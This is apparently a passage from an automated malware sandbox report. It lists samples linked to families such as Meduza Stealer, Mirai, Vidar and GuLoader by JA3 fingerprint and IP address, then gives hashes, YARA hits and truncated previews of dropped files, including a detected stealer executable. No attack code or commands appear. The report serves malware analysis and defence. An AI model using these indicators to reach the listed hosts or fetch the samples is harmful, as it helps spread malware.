	boatnet.mips.elf	Get hash	malicious	Mirai	Browse	147.45.124.54
	boatnet.m68k.elf	Get hash	malicious	Mirai	Browse	147.45.124.54

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	script.ps1	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.26.12.205
	pM3fQBuTLy.exe	Get hash	malicious	Vidar	Browse	104.26.12.205
	script.hta	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	Brooming.vbs	Get hash	malicious	Remcos, GuLoader	Browse	104.26.12.205
	TT copy.js	Get hash	malicious	FormBook	Browse	104.26.12.205
	TUp6f2knn2.exe	Get hash	malicious	LummaC	Browse	104.26.12.205
	QIo3SytSZA.exe	Get hash	malicious	Vidar	Browse	104.26.12.205
	R4qP4YM0QX.lnk	Get hash	malicious	Unknown	Browse	104.26.12.205
	R8CAg00Db8.lnk	Get hash	malicious	Unknown	Browse	104.26.12.205

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Temp\5mg21dmq.1jt.exe	script.ps1	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
C:\Windows\Temp\5mg21dmq.1jt.exe	script.hta	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
C:\Windows\Temp\inyligbs.qlq.exe	script.ps1	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
C:\Windows\Temp\inyligbs.qlq.exe	script.hta	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
C:\Windows\Temp\ochicikt.z2z.exe	script.ps1	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
C:\Windows\Temp\ochicikt.z2z.exe	script.hta	Get hash	malicious	CredGrabber, Meduza Stealer	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\loaddll32.exe.log

Download File

Process:	C:\Windows\System32\loaddll32.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\regsvr32.exe.log

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulJXZ:NllU
MD5:	471BBC91B9CBBCAE72EA156E1A7FB9BB
SHA1:	7E0459CEB5AB494EB060B243CEEB6759E43E5638
SHA-256:	4A3A8D2B6593185812082360BE4A0866DE5DC2A21FC90917EBDF454769CFF75F
SHA-512:	0062063F9BAF7D2F1B155103EA9BBD73D4B5E2F94EBEB8E2DADBC10BCF25F518E6B7EBC20EB87AA5AB839725DA797461DFB83FD4E1337C8195F3D1BA38C2F9A5
Malicious:	false
Preview:	@...e.................................B..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0dcl5ob1.3pm.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13imzm4c.wsv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1dmx4rgm.hpd.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ipdeqoc.lwl.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2vl4ovfe.2gf.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3duiz03j.et1.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52bohxd3.1ro.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5yh1mgj2.vnu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d5a1h3pj.r13.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxw4fv3r.lyx.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gldjisk0.ijr.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iby4zacu.cxh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jtopfrkn.weo.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l45n0hk3.wok.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m10shb2k.ge3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkqqcauw.wun.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzkhg0bs.xdh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pj13oevr.gxc.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qt3rwz5c.sd1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvmvncsc.vuo.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtrktd0z.y2v.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4mdop3h.dfu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xne5dwne.xlk.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwp5voyx.pdz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\5mg21dmq.1jt.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1292800
Entropy (8bit):	6.519533062327776
Encrypted:	false
SSDEEP:	24576:IgAMXnXkciEIMJQZe8Us9Mjemp5wx1wach0lhSMXl5xT+d:x3Xn0ciEIp3Us+egSx+ahpxTK
MD5:	C6813DA66EBA357D0DEAA48C2F7032B8
SHA1:	6812E46C51F823FF0B0EE17BFCE0AF72F857AF66
SHA-256:	1420F60F053C3EA5605239EE431E5F487245108B1C01BE75D16B5246156FA178
SHA-512:	19391C6B12BA8F34A5FAF326F8986EF8DE4729D614D72BF438C6EFA569B3505159CA55F580FE2A02642E5E7A0F1B38A7A9DB9F0D66D67BA548D84C230183159E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: C:\Windows\Temp\5mg21dmq.1jt.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Joe Sandbox View:	Filename: script.ps1, Detection: malicious, Browse Filename: script.hta, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.7./.d./.d./.d.W.e./.d.W.e./.d..e./.d...e./.d...e./.d...e./.d.W.e8/.d.W.e./.d.W.e./.d./.d...d.W.e./.d..e./.d.>d./.d..e./.dRich./.d........PE..d....7;g.........."....).4.......... ..........@..........................................`.................................................h...@................l..............<......8.......................(.......@............P..x............................text....2.......4.................. ..`.rdata..x....P.......8..............@..@.data....\|.......Z..................@....pdata...l.......n...<..............@..@.rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................................

C:\Windows\Temp\inyligbs.qlq.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1292800
Entropy (8bit):	6.519533062327776
Encrypted:	false
SSDEEP:	24576:IgAMXnXkciEIMJQZe8Us9Mjemp5wx1wach0lhSMXl5xT+d:x3Xn0ciEIp3Us+egSx+ahpxTK
MD5:	C6813DA66EBA357D0DEAA48C2F7032B8
SHA1:	6812E46C51F823FF0B0EE17BFCE0AF72F857AF66
SHA-256:	1420F60F053C3EA5605239EE431E5F487245108B1C01BE75D16B5246156FA178
SHA-512:	19391C6B12BA8F34A5FAF326F8986EF8DE4729D614D72BF438C6EFA569B3505159CA55F580FE2A02642E5E7A0F1B38A7A9DB9F0D66D67BA548D84C230183159E
Malicious:	true
